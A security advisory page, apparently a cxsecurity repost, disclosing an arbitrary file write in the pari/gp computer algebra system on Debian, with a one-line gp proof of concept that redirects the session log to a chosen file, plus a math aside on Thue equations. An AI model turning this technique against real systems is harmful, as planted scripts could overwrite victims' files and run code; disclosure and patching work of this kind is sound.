pari/gp 2.x Arbitrary File Overwrite

2019.11.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

pari/gp on debian stable allow arbitrary file write pari/gp is CAS (computer algebra system). pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster allow arbitrary file write and hence arbitrary code execution. poc: ======== \\ a.gp \\ to run: \r a.gp default("logfile","/tmp/a.txt");default("log",1);print("log(1)"); ======== Of mathematical interest is pari was missing solutions to Thue equations when assuming GRH (the fix changed polynomial bound to exponential bound): http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html t=thue(thueinit(x^3+92*x+1,0),3^3);t -- CV: https://j.ludost.net/resumegg.pdf site: http://www.guninski.com blog: https://j.ludost.net/blog


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top